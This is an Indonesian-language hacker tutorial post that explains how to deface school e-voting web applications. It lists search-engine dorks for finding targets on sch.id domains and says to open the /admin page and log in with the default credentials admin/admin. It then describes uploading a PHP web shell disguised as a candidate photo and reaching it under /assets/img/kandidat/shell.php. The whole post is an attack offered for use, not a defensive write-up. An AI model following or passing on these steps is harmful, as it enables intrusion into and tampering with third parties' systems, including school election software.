Assalamualaikum bro.... Kembali lgi sama gw ArdhyanX
kali ini gw mau share sedikit materi, cara "Deface Poc Aplikasi Sistem Evoting Weak Pass" Oke... Kita lgsg aja masuk ke tutorialny
-
Dork: intitle :
intitle:e-voting intext:login
intitle:"Aplikasi Sistem e-voting" intext:login
Copyright © 2020 E-voting site:sch.id
Aplikasi E-voting Berbasis web
Aplikasi e-voting site:sch.id
-
Exploit : Site.com/admin
-
Username/Password : Admin / Admin
-
Pertama kalian Ngedork dulu :)
-
Cari web yang sekiranya Vuln
-
Selanjutnya kalian bisa tambahkan admin di belakang domain nya contoh seperti dibawah ini sayang :)
"Site.sch.id/admin"
-
Maka tampilannya akan seperti itu Jika Sudah Kalian tambah kan. User Password nya yaitu admin & admin
-
& Bom!! Kalian akan terbawa masuk ke Dasboard admin nya Terus Kalian click Kalian Click Manajemen Kandidat
-
Seperti itu Terus Kalian Click Tambah Kandidat
-
Nama kardinat kalian isi semau lu sma visi misi nya dan kalian upload shell di Foto Kandidat Dan cara akses nya
"https://Site.sch.id/assets/img/kandidat/shell.php"
-
Oke mungkin sekian dulu dari gw, Terima Kasih
